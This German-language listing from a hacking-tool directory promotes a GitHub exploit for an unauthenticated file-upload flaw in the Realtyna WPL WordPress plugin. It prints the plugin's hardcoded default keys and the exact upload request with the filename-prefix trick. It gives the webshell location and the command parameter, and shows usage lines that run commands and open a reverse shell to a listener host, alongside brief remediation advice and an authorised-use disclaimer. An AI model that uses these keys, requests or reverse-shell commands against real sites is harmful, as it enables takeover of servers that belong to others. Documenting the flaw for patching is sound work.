Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-14483_exploit — Exploit für nicht authentifizierten, beliebigen Datei-Upload für das Realtyna WPL/Organic IDX WordPress-Plugin; verkettet PHP-Webshell-Upload mit RCE, mit Befehlsausführungs- und Reverse-Shell-Modi. | Kitploit
Tools/GitHubGitHub/0xdak/cve-2026-14483_exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed Teaming
GitHub0xdak/cve-2026-14483_exploit

CVE-2026-14483_exploit

Exploit für nicht authentifizierten, beliebigen Datei-Upload für das Realtyna WPL/Organic IDX WordPress-Plugin; verkettet PHP-Webshell-Upload mit RCE, mit Befehlsausführungs- und Reverse-Shell-Modi.

Repository anzeigen
vor 17 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-14483 — Realtyna WPL / Organic IDX: Nicht authentifizierter beliebiger Datei-Upload → RCE

Nicht authentifizierter beliebiger Datei-Upload, der in dem Realtyna WPL / Organic IDX WordPress-Plugin (real-estate-listing-realtyna-wpl ≤ 5.2.0) zu RCE führt.

Das Plugin registriert einen "I/O-Dienst" am öffentlichen WordPress-init-Hook, erreichbar ohne Authentifizierung an der Site-Wurzel über ?wplview=io&wplformat=io. Das einzige Hindernis ist ein Paar statischer, fest codierter Standardschlüssel, die in den Migrationen des Plugins ausgeliefert werden (auf jeder Installation identisch), wobei io_status standardmäßig aktiviert ist:

root@kitploit:~
public_key  = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
private_key = Eft76bdh0o2uyhJkbG3T

Der Befehl set_property (libraries/io/mobile_application/set_property.php → wpl_file::upload) speichert die hochgeladene Datei file[] mit move_uploaded_file und ohne Überprüfung von Erweiterung/MIME, sodass eine .php-Webshell abgelegt und als Web-Benutzer ausgeführt werden kann.

  • Betroffen: real-estate-listing-realtyna-wpl ≤ 5.2.0
  • Behoben: 5.3.0 (der anfällige, nicht authentifizierte Befehl wurde entfernt)
  • CWE: 434 (Unrestricted Upload of File with Dangerous Type)
  • Auswirkungen: nicht authentifizierter RCE als Web-Benutzer (www-data)

Anforderungen

Nur Python-3-Standardbibliothek — keine Abhängigkeiten.

Verwendung

root@kitploit:~
# run a command and print output
python3 exploit.py http://target/ -c id

# reverse shell (start a listener first: nc -lvnp 4444)
python3 exploit.py http://target/ --shell 10.10.14.5:4444

So funktioniert es

  1. Hochladen — POST /?wplview=io&wplformat=io&public_key=…&private_key=…&cmd=set_property&commands_directory=mobile_application&user_id=1 mit einer Multipart-Datei file[] namens image_<name>.php. Das Präfix image_ wird entfernt, sodass die Datei als <name>.php gespeichert wird.
  2. Lokalisieren — die Webshell landet unter wp-content/uploads/WPL/<pid>/<name>.php, wobei <pid> die ID der durch die Anfrage erstellten Property ist (die Antwort gibt sie nicht zurück). Das Tool enumeriert kleine Property-IDs, um die Shell zu finden.
  3. Ausführen — rufe …/<name>.php?c=<cmd> auf.

Identifizieren eines Zielsystems

Eine WordPress-Seite mit aktivem Plugin real-estate-listing-realtyna-wpl ≤ 5.2.0. Der Endpunkt antwortet unter GET /?wplview=io&wplformat=io (dem I/O-Dienst des Plugins).

Abhilfe

Aktualisiere das Plugin auf ≥ 5.3.0, validiere Upload-Erweiterungen/MIME, führe niemals PHP aus wp-content/uploads aus und rotiere die statischen Standard-I/O-Schlüssel des Plugins.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Verwende es nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.

Tool herunterladen